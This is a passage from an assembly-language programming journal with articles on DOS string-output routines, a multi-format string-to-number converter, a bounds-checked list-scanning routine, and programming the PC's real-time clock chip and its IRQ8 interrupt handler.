they are both MOV's, also if one of the registers is AX (or EAX in 32-bit
code) you get a lovely 1 byte instruction bonus.

     XCHG is in fact the real instruction hiding behind the psuedo-op NOP.
If you look at the opcode for a NOP, it is 090h, this is actually the
encoding for XCHG AX,AX, which since it has no effect on the machine state
whatsoever (except of course IP+=1) is ideally suited for this.

     I haven't looked back since adding putch to my library. I used to use
the sequence:-

     MOV DL,<char>; MOV AH,2; INT 021h

     Not only is the putch method much cleaner and more flexible it is
also saving bytes! Of course the pay-back is that this method adds clocks.
However if you think about it the wasted clocks are meaningless really.
Sending characters one at a time to stdout is rather like spelling out
a dictate to your secretary letter-by-letter. In a case where you want
more MIPS you should be looking at your higher level algorithm and not
the output routine, an INT takes a vast amount of time anyway...

;putch-     write single character to stdout
;           uses DOS function 02h
;
;entry:     AL=character to write
;
;exit:      (no parameters are returned)

putch   PROC NEAR

         PUSH DX
         XCHG DX,AX
         MOV AH,2
         INT 021h
         XCHG DX,AX
         POP DX
         RET

putch   ENDP


     Not hot on speed this strlen, it was written to be compact. You can
if you wish write MUCH faster code than this. I believe X-Bios2 presented
something along these lines in a previous APJ. However, the most important
thing here is certainly not speed, and again if you wanted speed on string
handling so badly, you should really not use asciiz at all; it was never
designed for that.

;strlen-    return length of asciiz string
;
;entry:     DS:SI=address of asciiz string
;
;exit:      CX=length of string

strlen  PROC NEAR

         PUSH AX
         XOR CX,CX
         DEC CX

lop:    INC CX
         LODSB
         CMP AL,1
         JNC lop

         SBB SI,CX
         POP AX
         RET

strlen  ENDP

     Now, already, we start getting serious payback for being so good.
The code virtually writes itself.....

;pstr-      write asciiz string to stdout
;
;entry:     DS:SI=address of asciiz string
;
;exit:      (no parameters are returned)

pstr    PROC NEAR

         PUSH CX
         CALL NEAR PTR strlen
         CALL NEAR PTR pstrcx
         POP CX
         RET

pstr    ENDP

;pstrcr-    write asciiz string to stdout with appended newline
;
;entry:     DS:SI=address of asciiz string
;
;exit:      (no parameters are returned)

pstrcr  PROC NEAR

         CALL NEAR PTR pstr
         JMP NEAR PTR outcr

pstrcr  ENDP


;outcr-     write newline to stdout
;
;entry:     (no entry parameters)
;
;exit:      (no parameters are returned)

outcr   PROC NEAR

         PUSH AX
         MOV AL,0Dh;CALL NEAR PTR putch
         MOV AL,0Ah;CALL NEAR PTR putch
         POP AX
         RET

outcr   ENDP


;pchn-      write repeated character to stdout
;
;entry:     AL=character
;           CX=repetitions  (0 is valid and does nothing)
;
;exit:      (no parameters are returned)

pchn    PROC NEAR

         JCXZ don
         PUSH CX
lop:    CALL NEAR PTR putch
         LOOP lop
         POP CX
don:    RET

pchn    ENDP


;pstrlcl-   output string DS:SI left justified in a field
;           of CL spaces
;
;           if the field width is smaller than the string length
;           then the string is simply output
;
;entry:     DS:SI=asciiz string
;           CL=field width
;
;exit:      (all registers preserved)

pstrlcl PROC NEAR

         PUSH AX
         PUSH CX
         CALL NEAR PTR pstr
         MOV CH,0
         XCHG CX,AX
         CALL NEAR PTR strlen
         SUB AX,CX
         JNA SHORT don
         XCHG CX,AX
         MOV AL,020h
         CALL NEAR PTR pchn
don:    POP CX
         POP AX
         RET

pstrlcl ENDP

     Note the use of JNA. If you look at the logic for the JNA branch
(not many people seem to do this) you find that it branches iff
CF=1 OR ZF=1, hence after the SUB if the result goes <=0

     You may notice that all the routine names are <= 8 chars. The reason
for this being that you can save each one as a seperate file, giving it
the name of the routine. This allows easy reference but has a drawback
or two:

     (i) you have to remember the dependencies when you INCLUDE them
    (ii) you end up with a LOT of files

     So far I haven't found either of these 'drawbacks' to be a serious
problem.

     I will be referring back to routines a lot in future articles; whenever
routines are required I will state it and the code shall have a list of
INCLUDE's for the routines to be included. In this manner it will be
possible
to present quite untrivial programs within a reasonable amount of space.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                   Converting Strings to
Numbers
                                                   by Chris Dragan


    Many programs require user input, which is often numbers. For this
purpose
there are library functions, like for example sscanf() in C. But in assembly
all has to be done by hand, even under Windows (with the exception of edit
controls - GetDlgItemInt() function).

    My last project required a flexible function for reading numbers stored
as
strings. From this project I carried out a great function which handles most
of common number formats.

    The function expects esi register to point at a string, which is a
number.
The string can have one of the following forms:

      10   decimal integer
      10D  decimal integer
      1010B     binary integer
      AH   hexadecimal integer (does not require leading zero)
      0XA  hexadecimal integer
      $A   hexadecimal integer
      12Q  octal integer
      12O  octal integer
      10F  float
      10.0 float
      10.0F     float
      1.0E+1F float
      1.E+1     float

    The string is required to have all letters (hex digits, number type
specifiers) uppercase. If a number is to contain lowercase letters, it has
to be converted before calling the function.

    The function returns in eax number type:
      - 0 if the number is invalid,
      - 1 if the number is a dword integer,
      - 2 if the number is a qword integer and
      - 3 if the number is a float.
The number is returned in edx (dword), ecx:edx (qword) or st(0) (float).
The number will be a qword integer if it exceedes 0xFFFFFFFF boundary.
Also notice that the number is assumed to be positive, '-' before the
number is not accepted and has to be handled externally.

    Floating point conversion is done using multiplication, not by means
of fbld instruction. This is because fbld instruction limits numbers to
19 characters, but the function can accept longer numbers if only they
are not too large/small.

    And here is the function. It was written (and tested) in TASM's ideal
mode,
but it can be easily ported to MASM or NASM. The function preserves all
registers but eax, ecx and edx, which are used for return value.

; This helper macro checks if there was an error on the fpu

macro     chkfpu _endinglabel
                fxam
                fstsw     ax
                sahf
                jc   _endinglabel
endm

proc ConvertNumber uses edi

;---------------- Identify number format

           ; Search for 0 at the end
                mov  edi, esi
                or   ecx, -1
                xor  eax, eax
                cld
             repne scasb

           ; Move to the last character
                dec  edi
                dec  edi

           ; Is there anything ?
                cmp  esi, edi
                ja   __invalid

           ; Identify C-style and Pascal-style hexadecimals
                cmp  [byte esi+1], 'X'
                je   __c_hex
                cmp  [byte esi], '$'
                je   __pas_hex

           ; Identify other types using the last character
                movzx     eax, [byte edi]
                cmp  eax, 'H'
                je   __asm_hex
                cmp  eax, 'B'
                je   __binary
                cmp  eax, 'D'
                je   __decimal
                cmp  eax, 'Q'
                je   __octal
                cmp  eax, 'O'
                je   __octal
                cmp  eax, 'F'
                je   __float_clr

           ; Find a comma (distinguish between integer and float)
                not  ecx
                dec  ecx
                mov  eax, '.'
                mov  edi, esi
             repne scasb
                je   __float

;---------------- Process decimal integer

           ; Prepare
__decimal:          mov  [byte edi], 0
                mov  edi, esi
                xor  eax, eax

           ; Get a digit
__next_decimal:     movzx     ecx, [byte edi]
                inc  edi
                xor  edx, edx

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Multiply the already loaded part by ten
                add  edx, 10
                mul  edx

           ; If an overflow occurs - the number is a quadword
                jo   __decimal_qword

           ; Check digit validity
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                add  eax, ecx

           ; Next digit or process a quadword if carry occurs
                jnc  __next_decimal
                jmp  __decimal_carry

;---------------- Decimal (appears to be greater than 0FFFF_FFFFh)

           ; Check digit validity
__decimal_qword:    sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit (qword addition)
                add  eax, ecx
__decimal_carry:    adc  edx, 0

           ; Load next digit
                movzx     ecx, [byte edi]
                inc  edi

           ; Check for ending zero
                test ecx, ecx
                jz   __finito

           ; Multiply high part by 10
                push eax
                mov  eax, edx
                mov  edx, 10
                mul  edx

           ; Number too large if an overflow occurs
                jo   __decimal_overflow

           ; Multiply low part by 10
                xchg eax, [esp]
                mov  edx, 10
                mul  edx

           ; Join high parts
                add  edx, [esp]

           ; Number too large if carry
                jc   __decimal_overflow

           ; Next digit
                add  esp, 4
                jmp  __decimal_qword

           ; Handle overflow
__decimal_overflow: pop  eax
                jmp  __invalid

;---------------- Process hexadecimal integer

           ; Was Pascal-style hex (leading '$')
__pas_hex:          lea  edi, [esi+1]
                jmp  __hex

           ; Was C-style hex (leading '0X')
__c_hex:       cmp  [byte esi], '0'
                jne  __invalid
                lea  edi, [esi+2]
                jmp  __hex

           ; Was asm-style hex (ending with 'H')
__asm_hex:          mov  [byte edi], 0
                mov  edi, esi

           ; Clear what will become the number
__hex:              xor  eax, eax
                xor  edx, edx

           ; Get a digit
__get_hex:          movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Number too large if the most significant nibble of edx
           ; is nonzero
                cmp  edx, 0FFFFFFFh
                ja   __invalid

           ; Multiply the already converted part by 16
                shld edx, eax, 4
                add  eax, eax ; to avoid shift (see lea below)

           ; Convert ASCII to digit
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                jna  __hex_ok
                sub  ecx, 7
                cmp  ecx, 9
                jna  __invalid
                cmp  ecx, 15
                ja   __invalid

           ; Add the digit
__hex_ok:      lea  eax, [eax*8+ecx]
                jmp  __get_hex

;---------------- Return integer

__finito:      mov  ecx, edx
                mov  edx, eax
                cmp  ecx, 1
                sbb  eax, eax
                add  eax, 2
                ret

;---------------- Process binary integer

           ; Prepare
__binary:      mov  [byte edi], 0
                xor  eax, eax
                xor  edx, edx
                mov  edi, esi

           ; Get a digit
__get_binary:       movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Shift everything left and add the digit
                shr  ecx, 1
                adc  eax, eax
                adc  edx, edx
                jc   __invalid

           ; Check digit validity and get next digit if OK
                cmp  ecx, '0' shr 1
                jne  __invalid
                jmp  __get_binary

;---------------- Process octal integer

           ; Prepare
__octal:       mov  [byte edi], 0
                xor  eax, eax
                xor  edx, edx
                mov  edi, esi

           ; Get a digit
__get_octal:        movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Check if there is a room for another digit
                cmp  edx, 1FFFFFFFh
                ja   __invalid

           ; Multiply the already converted part by 8
                shld edx, eax, 3

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 7
                ja   __invalid

           ; Add the digit
                lea  eax, [eax*8+ecx]
                jmp  __get_octal

;---------------- Invalid number

__invalid:          fninit
                xor  eax, eax
                ret

;---------------- Process integer part of a float

           ; Prepare (st0=0, st1=10)
__float_clr:        mov  [byte edi], 0
__float:       finit
                push 0300h ; mask off all interrupts
                fldcw     [word esp]
                push 10
                fild [dword esp]
                add  esp, 8
                fldz
                mov  edi, esi

           ; Get a digit
__get_integer:      movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __float_ready

           ; Comma starts fraction part
                cmp  ecx, '.'
                je   __float_fraction

           ; Multiply the already converted part by 10
                fmul st, st(1)
                chkfpu    __invalid

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_integer

;---------------- Process fractional part of a float

           ; Prepare (st0=0, st1=1, st2=num, st3=10)
__float_fraction:   fld1
                fldz

           ; Get a digit
__get_fraction:     movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __fraction_ready

           ; E starts exponent
                cmp  ecx, 'E'
                je   __fraction_ready

           ; Multiply the already converted part by 10
                fmul st, st(3)

           ; Multiply the divisor by 10
                fxch st(1)
                fmul st, st(3)
                fxch st(1)
                chkfpu    __invalid
                fxch st(1)
                chkfpu    __invalid
                fxch st(1)

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_fraction

;---------------- Process exponent part of a float

           ; Divide the fraction by the divisor
__fraction_ready:   fdivrp    st(1), st

           ; Add fraction to integer
                faddp     st(1), st

           ; E indicates start of exponent
                cmp  ecx, 'E'
                jne  __float_ready

           ; Prepare (st0=0, st1=num, st2=10)
                fldz

           ; Sign of the exponent
                xor  edx, edx
                cmp  [byte edi], '-'
                jne  __no_minus
                not  edx
                inc  edi
__no_minus:         cmp  [byte edi], '+'
                jne  __get_exponent
                inc  edi

           ; Get a digit
__get_exponent:     movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __exponent_ready

           ; Multiply the already converted part by 10
                fmul st, st(2)
                chkfpu    __invalid

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_exponent

           ; Multiply by 10**exp (** is a power operation)
__exponent_ready:   test edx, edx
                jz   __positive_exp
                fchs
__positive_exp:     fldl2t;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿10**x = 2**(x*log2(10))
                fmulp     st(1), st ;³
                fld  st        ;³
                frndint        ;³
                fsub st(1), st ;³
                fld1           ;³
                fscale              ;³
                fstp st(1)          ;³
                fxch st(1)          ;³
                f2xm1               ;³
                fld1           ;³
                faddp     st(1), st ;³
                fmulp     st(1), st;ÄÄÄÄÄÄÄÙ
                fmulp     st(1), st

           ; Return float
__float_ready:      chkfpu    __invalid
                fstp st(1)
                mov  eax, 3
                ret
endp



And that is it. The function is not meant to work as fast possible and was
not optimized, but it does the task it has to do.














::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       List Scan Library
Routine
                                                       by Laura Fairhead


     Firstly let me introduce an auxillary routine this uses. It is
called 'scaws' and scans past white space. It is very simple, and the
definition of whitespace here is SPACE (020h) or TAB (09h):-

========START OF CODE======================================================

;
;scaws-     scan whitespace
;
;entry:     DS:SI=string
;           DF=0
;
;exit:      SI=updated to first non-whitespace character
;           AL=value of the character
;

scaws   PROC NEAR

;
;there is nothing to explain here but you might take note now
;that I always use the same label names in different PROC blocks,
;in MASM you can do this with OPTION SCOPED
;

lop:    LODSB
         CMP AL,020h
         JZ lop
         CMP AL,09h
         JZ lop
         DEC SI
         RET

scaws   ENDP


========END OF CODE========================================================

     'scalst' is basically a routine to scan-convert a list which can
consist of values and strings. The radix of the values must be set
before hand by calling 'scanur' as the routine uses 'scanu' to convert
values and doesn't set the radix itself. The syntax of the list is
almost the same as the list in DEBUG, where in fact I got the idea from.
You have from 0+ data items, optionally seperated by commas. Whitespace
can be used freely as a delimitor and no delimitors are necessary where
there is no need for them (eg: between a value and a string).

     The routine takes several parameters, the address of your string
(DS:SI), the address of somewhere to store the converted data (ES:DI),
the size of the data store (CX) and the size of a unit (AL). The unit size
can be byte (AL=1), word (AL=2), dword (AL=4).

     Each data item, as in value/string character, is zero-padded to the
unit size for storing. Also values are checked that they are in range for
the unit size. This method therefore allows us to have those silly
word strings.

     Here are some examples, all of these assume that we had set the
radix = 010h (by calling 'scanur' with AL=010h) :-

     Calling with AL=1, and our string=1 2 3 "ABC" yields:-

     01 02 03 41 42 43

     Calling with AL=4, and our string="0"1FE08 2 yields:-

     30 00 00 00 08 FE 01 00 02 00 00 00

     Calling with AL=2, and our string=9A06 87"DEF" yields:-

     06 9A 87 00 44 00 45 00 46 00

     Calling with AL=2, and our string="ABC"FE0FE 0 1 2 yields:-

     ERROR! CF=1        (FE0FE>FFFF)

     A particularly powerful feature of this routine is that it takes
a parameter giving the size of your data store (in bytes). This means
that it will be impossible for the program to be crashed because there
was too much data. Programmers are generally too lazy to do this sort of
range checking, and much to their woe as one particularly wily hacker
attack called 'crashing the stack' has taught.

     Example; if we called with AL=2, CX=4 and string=1 9 F

     ERROR! CF=1        (01 00 09 00 0F 00 > 4bytes)

     As an aside, the function is not entirely the same as DEBUG's list
scanner. With DEBUG the strings are always converted to byte lists, no
matter what the unit size is. It is trivial to modify the routine to
work in this way.

     One last note is that the end of the list is the first invalid
character in the string, this not being an error of course since it is
the responsibilty of the controlling parser to decide this based on the
context; eg: DEBUG might check for a semicolon comment on the end of
the line, though as a matter of fact it doesn't. A premature ending (ie:
0 byte appearing inside the quotes of a string token) will abort with
error, thus;

     AL=1, string=0A 98"unterminated string  yields:-

     ERROR! CF=1         (unterminated string)


========START OF CODE======================================================

;
;scalst-    data list scan/convert routine
;
;entry:     DS:SI=string
;           ES:DI=store
;           CX=#bytes size of store
;           AL=unit size (1=byte,2=word,4=dword)
;           DF=0
;
;           "scanur" must have been called at least once previously
;           in order to set the radix of scanned values
;
;        !! entry parameters are not validated and invalid entry
;        !! parameters will cause undefined behaviour
;
;exit:      CF=1=>error (parse/overflow)
;           CF=0=>okay, then:
;               ZF=1=>no data scanned, ie: CX=0
;               ZF=0=>data scanned
;           SI=updated to the first invalid character
;           DI=updated to the end of converted data + 1
;           CX=#bytes converted data (invalid on overflow error)
;
;note:      requires routines "scaws" and "scanu"
;

scalst  PROC NEAR

;
;initialise stack frame
;[BP-4] (dw) size mask
;            =000000FFh for unit size 1
;            =0000FFFFh for unit size 2
;            =FFFFFFFFh for unit size 4
;[BP-6] (w)  unit size
;[BP-8] (w)  original data offset DI
;
;EAX is preserved and the main loop is entered
;
         ENTER 8,0
         PUSH EAX
         CBW
         MOV [BP-6],AX
         NEG AL
         AND AL,3
         SHL AL,3
         PUSH CX
         XCHG CX,AX
         OR EAX,-1
         SHR EAX,CL
         POP CX
         MOV [BP-4],EAX
         MOV [BP-8],DI
         JMP SHORT inlop

;
;main loop head
;  ignore any whitespace and skip the optional comma
;
lop:    CALL NEAR PTR scaws
         CMP BYTE PTR [SI],','
         JNZ SHORT ko
         INC SI

;
;main loop entry
;  ignore any whitespace and if a value token is recognised
;  write it to data store and continue loop
;
inlop:  CALL NEAR PTR scaws
ko:     CALL NEAR PTR scanu
         JC SHORT don
         JZ SHORT ko2
;
;  check that the value is in range for the unit size, if not
;  abort here with an error
;
         CMP [BP-4],EAX
         JC SHORT don
         CALL NEAR PTR wracc
         JMP lop

;
;  no value was present so check for a string
;
ko2:    CMP BYTE PTR [SI],022h
         CLC
         JNZ SHORT don
;
;  get string into data store
;
         INC SI
         XOR EAX,EAX

lop1:   MOV AL,[SI]
;
;  unterminated string causes an error abort, LODSB is not used for the
;load in order to ensure that [SI] will point to the invalid character
;
         CMP AL,1
         JC SHORT don
         INC SI
         CMP AL,022h
         JZ lop
         CALL NEAR PTR wracc
         JMP lop1

;
;  exit point for 'wracc' routine below, clean-up the stack
;
err0:   POP EAX

;
;  main exit point. the carry flag is preserved as this is used
;  for both error and normal exits. the number of bytes stored
;  is calculated into CX, the INC/DEC ensuring ZF=1 if this was zero
;
don:    LAHF
         MOV CX,DI
         SUB CX,[BP-8]
         SAHF
         INC CX
         DEC CX
;
;  restore the only corrupted register and 'LEAVE'
;
         POP EAX
         LEAVE
         RET

;
;wracc- write datum in accumalator to data store
;  AL/AX/EAX is written to the data store depending on the unit size.
;  throughout the routine DI is the offset into the data store and
;  CX is the #bytes left in it. these are updated but if there are
;  insufficient bytes remaining in the store we abort with error, taking
;  care to clear the 4 bytes (AX + return address) off the stack first
;
wracc:  PUSH AX
         MOV AX,[BP-6]
         SUB CX,AX
         JC err0
         CMP AL,2
         POP AX
         JZ SHORT ko0
         JNS SHORT ko1
         STOSB
         RET
;
;  note that 066h STOSW = STOSD
;
ko1:    DB 066h
ko0:    STOSW
         RET

scalst  ENDP

========END OF CODE========================================================



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                                Using the RTC
                                                                by Jan
Verhoeven


Here are some routines to use the RTC/CMOS chip for serious timing. It's
an introductory tutorial, so you'll be given more than enough opportunity to
experiment with timing via this method.


About the hardware.
===================
The RTC chip used to be a Motorola MC 146818A chip, but nowadays you
will either find a Dallas 1287 or 1387 style chip, or it is embedded in
the chipset. So far for romance... :o)

I will describe the Dallas DS 1287 since this is the configuration which
is most common for many years now, and the majority of the features are
the same as for the other chips.

The DS 1287 is a clock/RAM with a Lithium battery inside the package.
That's why it stays so big: the battery needs space. If the system is
powered on, the RTC gets its power from the powersupply. When the PC is
off, the RTC goes into power-down mode and slowly drains the Lithium
cell. Expected life for the battery is around 10 years.

The DS 1287 has 64 storage locations, 14 of which are clock and control
registers and the remaining 50 are battery-backed general purpose RAM
cells. This is were the CMOS setup of your PC stores it's system setup
data.

The programmable clock can issue an interrupt, which can be triggered by
three independent events: time of day, periodic signal or end of clock-
update.

The 14 registers inside the DS 1287 are:

     address         purpose
     -------         ---------------------------------------
        0            current value of seconds
        1            alarm setting for seconds
        2            current value of minutes
        3            alarm setting for minutes
        4            current value of hours
        5            alarm setting for hours
        6            Day of the week [Sunday = 1]
        7            Day of the month
        8            month                   [0..12]
        9            year of this century    [0..99]
       10            Control register A
       11            Control register B
       12            Control register C      [read-only]
       13            Control register D      [read-only]

If you want to know the time of day, or any other date related data,
just select the RTC chip and request the contents of the desired
register.

The alarm registers can be set to generate long-time periodical
interrupts, or for having the chip give a signal when it's time for your
nap. The alarm rate ranges from seconds to weeks.
And since these alarm registers are almost never used, they can also be
used for storing some data for your own software. PTS Partition Manager
for example uses these registers to keep track of where it was, while
reformatting the hard disk. If there is a power-fail, it will just
continue where it left off.

In the PC, the RTC chip is hidden from the programmer. It can only be
accessed in an indirect way. The trick is to first select a register
location and then access that one register as follows:

         mov     al, <register number>
         out     70h, al         ; select <register number>

         in      al, 71h         ; for a READ operation
         out     71h, ah         ; for a WRITE operation

So, we use port 70h for selecting a register or storage location and use
port 71h for doing the actual access to that register. A bit tedious,
but that's how the PC was designed in the first place.

In "old style" RTC chips the century is maintained in software. It
resides in a RAM cell, offset 32h/50d, so it will not be affected by a
year-rollover from 99 to 00. If you update it with a short piece of code
on January first 2000, your PC will be ready for many, many, moons to
come.


The control registers.
======================
Registers A, B, C and D are the registers that control the working of
the RTC clock. They have various functions and register D uses just a
singe bit, which is also read-only....
But this chip is well engineered and all registers have a significant
(although not always logical) influence on the operation of it.


Register A: Timing control.
---------------------------
Register A is layed out as follows:

     bit     function
     ---     ------------------------------------------------------------
      7      UIP bit: Update In Progress. When there's a ONE in this flag
             the timing registers are being updated and it is not safe to
             read them. Better to wait until this flag is cleared.
             This one bit is read-only!

     4-6     DV0-DV2: these three bits control the on-chip oscillator. Do
             not experiment too much with this setting. There is only ONE
             valid combination for these three bits: 010.

     0-3     RS0 - RS3: These are the four Rate Selector bits. They
             determine how often the IRQ pin is activated. The following
             table shows the meaning of the different values.

             RS3  RS2  RS1  RS0    Frequency [Hz]    Period [ms]
             ---  ---  ---  ---    --------------    -----------
              0    0    0    0           ---             ----
              0    0    0    1           256             3.906
              0    0    1    0           128             7.813
              0    0    1    1          8192             0.122
              0    1    0    0          4096             0.244
              0    1    0    1          2048             0.488
              0    1    1    0          1024             0.977
              0    1    1    1           512             1.953
              1    0    0    0           256             3.906
              1    0    0    1           128             7.813
              1    0    1    0            64            15.625
              1    0    1    1            32            31.25
              1    1    0    0            16            62.5
              1    1    0    1             8           125.0
              1    1    1    0             4           250.0
              1    1    1    1             2           500.0

            The default value in the average IBM PC is 0110 or 1024 Hz.
            Since no IRQ is enabled, you will not notice any difference
            if you change the value.


Register B: Internal operation control.
---------------------------------------
This is the most important register for controling operation of the RTC
chip. Register A determines timing and oscillator parameters, but the B-
register determines how the system will notice these conditions.
In a normal PC, only bit 1 (24/12) is set. All other bits are cleared.

     bit     function
     ---     ------------------------------------------------------------
      7      SET : If you determine to write a ONE in this bit position,
             the clockregisters will not be updated anymore. Only when
             this bit is ZERO, the clockregisters will be updated.

      6      PIE : The Periodic Interrupt Enable bit controls the IRQ
             pin. If this bit is ZERO, no IRQ will be given when the
             programmable frequency source (selected by RS0 - RS3) times
             out.
             You need to set this bit to a ONE to enable a periodic IRQ
             operation.

      5      AIE : Alarm Interrupt Enable. When this bit is ONE, the IRQ
             pin is activated when the alarm-time equals the actual time.

      4      UIE : "Update Ended" Interrupt Enable. When this bit is set
             to ONE, the IRQ line is asserted when the timing registers
             have changed contents.

      3      SQWE : Put a ONE in this bit to have the programmable
             interval timer (which is controlled by RS0 - RS3) output a
             square wave on pin 23 of the chip.
             Unfortunately this pin 23 is not connected in a PC so for us
             this bit has no meaning. But if you are man enough to bring
             pin 23 of the DS 1287 to the outside world, you can use it
             at will.

      2      DM : Data Mode. The timing registers can display their data
             in two different modes: binary and BCD. In the PC, this bit
             is always ZERO, meaning that BCD is the desired format.

      1      24/12 : Controls if hours are shown in 12 or 24 hours mode.
             Put a ONE inhere and you have 24 hours in a day. Clear this
             bit and you end up with two half days of 12 hours each. In
             the 12-hour mode, bit 7 acts as an AM or PM flag.

      0      DSE : Daylight Saving Enabled. Always leave this bit cleared
             to ZERO. Daylight saving time periods vary worldwide and the
             dates of change are determined by politicians and not by
             chipmakers. Unfortunately.


Register C: Interrupt sources.
------------------------------
Register C is a status-word only. The bits in this register are read-
only and only have menaing AFTER an IRQ was received.
Since there is just one IRQ pin on the RTC chip, the IRQ can have three
different sources and there's no way to know which one triggered it,
unless there was only one source enabled. The bits mean the following:

     bit     function
     ---     ------------------------------------------------------------
      7      IRQF : If this bit is ONE, one of the actual interrupt
             conditions was enabled and the interrupt condition was met.

      6      PF : Periodic interrupt Flag. If this bit is set, the source
             of this IRQ source was the programmable interval timer.

      5      AF : Alarm interrupt Flag. If this bit is set, the alarm
             condition was the same as the actual date/time.

      4      UF : The "Update Ended" interrupt Flag. If this bit is set,
             the IRQ was issued by an update of the timing registers.

Bits 0 - 3 are meaningless and will always be ZERO.


Register D: Battery status.
---------------------------
On the chip, there is a voltage reference that is constantly being
compared to the battery voltage. If the battery voltage drops below the
reference voltage, the battery is considered empty and bit 7 will be
SET.
If bit 7 is a ONE, the battery has been empty for some period of time
and hence the data in the timing registers and in the RAM locations MAY
have lost their meaning.

Bits 0 - 6 have no meaning in this register and will always return a
ZERO value.


Using the RTC internals.
========================
This, in a nutshell, is what the RTC chip is from the inside. I already
explained some lines above how to access the storage locations and the
timing registers of the DS 1287. This does not mean that everything will
also work the first time.

If you need to change a timing value, you must always first disable
register updates, even if you make sure that the changes you make to the
timing registers will well fit in an RTC timeslot. This means:

      -   access register B and set the SET flag
      -   change the timing registers
      -   access register B and clear the SET flag

Remember, there's not much intelligence inside a DS 1287. More recent
chips might do more tricks for the programmer, but the old beasties just
do as they were told.

In order to set the periodic interrupt rate, we use the following code:

   --- Begin ------------------------------------------- SetPIRate -----

   SetPIRate:                    ; Set Periodic Interrupt Rate
          mov   al, 0A           ; ah = rate to set
          out   070, al
          mov   al, ah
          out   071, al          ; and set it in register A
          ret

   ---- End -------------------------------------------- SetPIRate -----

This code is very straightforward. It relies on the fact that (in the
IBM PC) the contents of register A are always the same:

      bit  7      = read-only
      bits 4 - 6  = 010
      bits 0 - 3  = rate selector

So, it can set the value of bits 4 - 7 in the calling code. It is not
good programming, since we should:

      -      read in the contents of Register A
      -      clear bits 0 - 3
      -      OR in the new value
      -      write it back to register A


Inside the IBM PC.
==================
The IRQ pin of the RTC is connected to the Intel 8259 PIC (Programmable
Interrupt Controller, although "programmable" is too much honour for
this dumbo). In non-XT machines there are two of them, cascaded. This
means that the second one is connected to what used to be IRQ2. This
gives us a rather stupid PC IRQ priority list:

         IRQ     Priority        IRQ     Priority
         ---     --------        ---     --------
          0         0             8          2
          1         1             9          3
          2        10            10          4
          3        11            11          5
          4        12            12          6
          5        13            13          7
          6        14            14          8
          7        15            15          9

A lower number means a higher priority....

The RTC interrupt line is connected to PC-IRQ8. So it comes in third
place for being serviced. When enabled!

Normally IRQ8 is NOT enabled, so you will first have to settle that with
the PIC, which is far from easy to understand. I use the following code
to enable and disable the IRQ8 processing. Disabling this interrupt is
necessary after your program is unloaded from memory. If you don't do
this, the IRQ service routine vector might point to some random code or
data in the next program loaded (like Command.Com).

   ----------------------------------------------------- EnableIRQ8 ----

   EnableIRQ8:                   ; enable IRQ 8 in 8259
          push  ax
          in    al, 0A1          ; get IRQ mask word
          and   al, not bit 0
          out   0A1, al          ; enable IRQ 8
          pop   ax
          ret

   ----------------------------------------------------- EnableIRQ8 ----

Easy, isn't it? It took some nights to figure this out, 'cause the Intel
databooks are not that clear. I was glad to find some NEC databooks
since these shed some more light. In general, for older chips, NEC is a
good choice of databooks. They used to second source 80x86 chips for
Intel and are still known for their innovations they put into their V20
and V30 chips. The V25, a vastly improved 8088, was contaminated by 8
full banks of 14 registers. Luckily Intel did not copy this. What would
a 386 have been with 250 GP registers?

Here's the code for disabling IRQ8:

   --- Begin ------------------------------------------ DisableIRQ8 ----

   DisableIRQ8:                  ; disable IRQ 8 in 8259
          push  ax
          in    al, 0A1          ; get IRQ mask word
          or    al, bit 0
          out   0A1, al          ; disable IRQ 8
          pop   ax
          ret

   ---- End ------------------------------------------- DisableIRQ8 ----

Asserting IRQ8 will make the PC generate an INT 70h. So, we need to have
an INT 70h handler ready:

   --- Begin ------------------------------------------ NewIRQ8 --------

   L0:      mov   [IrqCount], ax           ; and store it
   L1:      mov   al, 020                  ; tell stupid PC that IRQ ends
here
            out   020, al                  ; EOI to original PIC
            out   0A0, al                  ; EOI to cascaded PIC
            pop   ds, ax                   ; restore registers
            iret                           ; and get out

   NewIRQ8: push  ax, ds
         cs mov   ds, [DataSeg]            ; restore DS
            mov   al, 0C
            out   070, al
            in    al, 071                  ; clear interrupt flags
            test  [Flags], Running         ; are we running?
            jz    L1                       ; if not, get out
            test  [Flags], FastMode        ; Samplerate over 128 Sps?
            jz    >L2                      ; if not, scram
            or    [Flags], TimeOut         ; else set TimeOut flag
            jmp   L1

   L2:      mov   ax, [IrqCount]           ; medium to slow samplerates
